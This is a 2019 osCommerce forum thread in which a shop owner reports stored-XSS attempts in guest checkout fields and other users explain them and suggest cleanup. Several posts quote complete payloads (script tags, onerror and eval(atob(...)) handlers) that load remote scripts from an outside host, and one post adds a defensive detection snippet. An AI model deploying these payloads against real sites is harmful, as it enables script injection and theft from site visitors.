Guest Posted January 8, 2019

Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
Ithaca
Ithaca, New York 98765
United States

I've changed the name and address for this post, as the street address, city, state and zip code they provided are legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable:

A message that you sent contained one or more recipient addresses that were incorrectly constructed:
"Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")
This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible.

Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks!

- Andrea
JcMagpie Posted January 8, 2019

Yes, it's quite simple: they are trying to get you to save this to your db. They know that if they use your form and finish, osC will save to db, and that is what they do to get into the db. You should delete the account and clear the crap from the db. What were they trying to do? Who knows!
Guest Posted January 8, 2019

18 minutes ago, JcMagpie said: clear the crap from the db.

Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash...

- Andrea
ArtcoInc Posted January 8, 2019

@puggybelle As I understand it, osC has filters in place to prevent 'customers' from entering injection code when filling out forms. You did say that you are using PWA. While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code. That said, IIRC, the latest version of PWA is supposed to delete any customer record after the 'guest' checks out. I'm pretty sure that's why no 'customer' account exists.

M
raiwa Posted January 8, 2019

16 minutes ago, ArtcoInc said: While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code.

PWA uses exactly the same code that sanitizes customer input before storing the customer's data in the database as the core create account page. So it is as safe as the core create account page in that sense.
ArtcoInc Posted January 8, 2019

@raiwa Thank you for that clarification. Can you explain then how the injection code ended up in the orders record? Or, is that an issue with her version of osC not sanitizing the customer input in the orders record?

M
Guest Posted January 8, 2019

I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA.

- Andrea
ArtcoInc Posted January 8, 2019

@puggybelle Unfortunately, the Community Edition version of osC does not have an accurate version number system. Do you know if you are using 'Frozen'? Or a version of 'Edge'? The only way to really know which version you have is to look at the date of the original code package.

M
Guest Posted January 8, 2019

@ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master

- Andrea
ArtcoInc Posted January 8, 2019

FWIW, 'Frozen' was released on Aug 31, 2018. Additional work continues to be done under the 'Edge' name.

M
Guest Posted January 8, 2019

Is there anything I need to do? When I run Version Checker in Admin, it comes back with:

- Andrea
ArtcoInc Posted January 8, 2019

@puggybelle (while off topic ...) As I said, the Community Edition does not have an accurate version numbering system.

When Burt started this project back in 2014, osC was at version 2.3.3.4. So, the Community Edition, all through its early development, was also v2.3.3.4. Every release during these early times was called v2.3.3.4.

When osC upgraded to v2.3.4, Burt brought the Community Edition code base up to the v2.3.4 code base, and the Community Edition stayed at v2.3.4 while further development was happening. Somewhere during this time, Burt released the 'Gold' fixed release. Development still continued, with every release still being called v2.3.4.

When osC had the v2.3.4.1 Hot Patch applied, Burt also applied the Hot Patch, and the Community Edition was bumped up to v2.3.4.1. Once again, development continued, with every new release still being called v2.3.4.1.

Burt released the 'Frozen' fixed release in August, 2018. Development still continues (usually called 'Edge', although that is not a fixed release), and the version number is *still* v2.3.4.1. Some bugs have been identified in 'Frozen', and there is a thread here on the forum identifying them (and some fixes too). 'Edge' continues to be developed (still being called v2.3.4.1), and some significant changes have been made since 'Frozen', causing some compatibility issues with prior versions, and many (most?) add-ons out there.

This all said ... You can download the 'Frozen' version (see the link in my signature below). *** IF *** you have made NO core changes, you *should* be able to drop the 'Frozen' version into your store. Otherwise, you will need to use a file compare application to see what changes have been made since your release.

(now, to get back on topic ...) How this all relates to your initial problem, I don't know. Someone with a higher pay grade than myself will need to explore how the injection code made its way into your orders record.

M
Jack_mcs Posted January 9, 2019

6 hours ago, puggybelle said: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC

When the form is submitted, the commands are stripped from it. That is why you see the __script instead of <script. That renders the code useless as far as the hacker is concerned. At least it should. I never assume anything when they are involved. If you have an addon that records the IP, like View Counter or IP Blocker, then you should block the IP. That won't prevent others from using the same method but it might stop that guy.
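As an added example (not code from this thread or from osCommerce), the Python below runs a markup check over constructed form fields patterned on the submission in the first post, mimics the bracket stripping Jack_mcs describes, and shows why the order email bounced: a quote mark in the stored name breaks a hand-built To: header, while letting the email library quote the display name keeps it parseable. The field values and the attacker.invalid / example.invalid hosts are constructed placeholders, and strip_angle_brackets is a hypothetical stand-in, not osC's actual filter.

```python
import re
from email import policy
from email.headerregistry import Address

# Constructed sample submission modelled on the pattern quoted in the thread;
# the script host is a placeholder, not the domain from the original post.
SUBMISSION = {
    "name": 'Bob Smith"<script src=//attacker.invalid/i></sc',
    "street": '244 Whatever St"<script src=//attacker.invalid/i></script>',
    "city": "Ithaca",
    "email": "bobsmith987@example.invalid",
}

# Heuristic for fragments that have no business in a name or postal address:
# tag openers, inline event handlers and decode-then-eval chains.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(?:script|img|input|textarea|iframe|svg)\b"
    r"|\bon[a-z]+\s*="
    r"|\b(?:eval|atob|unescape)\s*\("
    r"|javascript\s*:",
    re.IGNORECASE,
)

def suspicious_fields(submission):
    """Fields whose raw value looks like injected markup. Check the raw input,
    so the attempt can be rejected and logged rather than silently sanitized."""
    return [f for f, v in submission.items() if MARKUP_RE.search(v)]

def strip_angle_brackets(value):
    """Stand-in for the bracket-stripping filter described in the thread
    (hypothetical, not osCommerce's code): '<script' comes out as '__script'."""
    return re.sub(r"[<>]+", "__", value)

def naive_to_header(display_name, addr_spec):
    """The failure mode from the bounce: the customer's own quote mark ends the
    quoted display name early and the rest of the header is garbage."""
    return f'"{display_name}" <{addr_spec}>'

def safe_to_header(display_name, addr_spec):
    """Let the email library quote the display name; embedded quotes and
    backslashes are escaped, so the header survives any name the form accepts."""
    return str(Address(display_name=display_name, addr_spec=addr_spec))

def header_defects(header_value):
    """Number of RFC 5322 parse defects the stdlib parser records for a To: value."""
    return len(policy.default.header_factory("To", header_value).defects)

def parsed_display_name(header_value):
    """Display name as a receiving mail system would parse it back out."""
    return policy.default.header_factory("To", header_value).addresses[0].display_name

if __name__ == "__main__":
    print("flagged fields:", suspicious_fields(SUBMISSION))
    stored = strip_angle_brackets(SUBMISSION["name"])
    for label, hdr in (("naive", naive_to_header(stored, SUBMISSION["email"])),
                       ("safe", safe_to_header(stored, SUBMISSION["email"]))):
        print(f"{label}: {hdr!r} -> {header_defects(hdr)} defect(s)")
```

The markup check is a heuristic for flagging and logging, not a replacement for the store's own sanitization; the header part is the fix for the bounce itself.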
Guest Posted January 9, 2019

@ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping!

@Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form, the part where buyers can add any additional comments with their purchase. But the < > tags have been stripped. Looks like this:

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse than ever. Thanks to everyone who posted - I appreciate it very much!

- Andrea
JcMagpie Posted January 9, 2019

I would say you still need to clean your db of any remnants of the injected script. The sanitiser is not 100%! Hackers know how this is done and add redundant characters to fool it. Manually clean the db, then run a virus scanner on the server if you can, or tell your host the script has been injected. You "MAY" have to restore db and/or site from backups before the injection if they find it has spread.
MrPhil Posted January 9, 2019

This is only appearing in this one order's data, and is not in everyone's (or in your osC code)? They are definitely trying to provoke your server into running what's presumably some nasty script code, but it's being disabled by osC. If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit. Unless you want to jump through the hoops of reporting them to the payment processor. If everyone is seeing this, you've got some cleanup to do and security holes to patch.

They're trying to inject and run some script code that creates more script, invisible images, and input field elements on your page. Some server in Guyana (they have computers there???) is involved (perhaps to load more malicious code). I haven't dived more deeply into it, but it looks like something you don't want running. Just be thankful it was (apparently) disabled before it could do the nasty.
Jack_mcs Posted January 9, 2019

13 hours ago, puggybelle said: It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that.

The jb.gy is a link to the hacker site. The gy is the TLD for Guyana. Once the full code is in your database, the hacker could access and load whatever from his site. If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, assuming you would not sell to anyone from there, along with any other country you won't sell to.
JcMagpie Posted January 9, 2019

I'm not so sure the script was stopped! Decoding what @puggybelle posted, most of it looks untouched and may still be active. If I decoded correctly, and it looks as if I did, I get:

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var=document.createElement("script");b.src="http://jb.gy/"+Math.random();(document.getElementsByTagName("HEAD")[]||document.body).appendChild();/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

As you see, most of the hexadecimal was left unstripped and works. I think it's active and still valid and will need to be rooted out of the site, but I could be wrong! You can never be sure about these bits of *~##ity scripts.
Guest Posted January 10, 2019

12 hours ago, MrPhil said: If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit

They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know?

3 hours ago, JcMagpie said: I think its active and still valid and will need to be roooted out of the site, but I could be wrong!

Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it.

10 hours ago, Jack_mcs said: If your host offers country blocking, or if you have View Counter installed, then you should block Guyana,

My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all!

- Andrea
Guest Posted January 10, 2019

Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody!

- Andrea
shery19 Posted April 22, 2019

If you often visit unknown sites, I recommend using VPN software for your security, because your private data can be stolen at any moment.
pete2007 Posted May 6, 2019

On 1/8/2019 at 6:00 PM, puggybelle said: Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually): [...] Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this?

I had a similar incident, where someone created an account with a script, no order was placed tho... but after doing checks nothing seems to have been changed, think I've been let off this time... Would you suggest using website security/firewall like siteguarding or sucuri would help prevent future issues like this? Thank you in advance.
Jack_mcs Posted May 6, 2019

15 minutes ago, pete2007 said: I had a similar incident, where someone created an account with a script, no order was placed tho

It's a very common thing for all database sites. See this thread for suggestions.
Guest Posted May 18, 2019

I want to report that I had another hack attempt this week - this time, thru the Search box. Apparently, there's no limit to what can be entered in the search field. I use an old contrib that I cleaned up called Keyword Search Report and when I looked at it yesterday, it was hysterical. Huge chunks of malicious code. Wish I had taken a screenshot of it, but I was so ticked off I immediately deleted the report and checked the database. I have since edited all files containing the Search form and put a maxlength="60" in all of them.

catalog > advanced_search.php
catalog > includes > modules > boxes > bm_search.php
catalog > includes > modules > content > header > cm_header_search.php

If I'm missing something, please let me know. This hacker crap is insane!

- Andrea
greasemonkey Posted May 18, 2019

9 minutes ago, puggybelle said: Huge chunks of malicious code.

Sorry? Where were these huge chunks of code??????? If the code was in a file on your server - you have a HUGE issue... that is nothing to do with the file itself.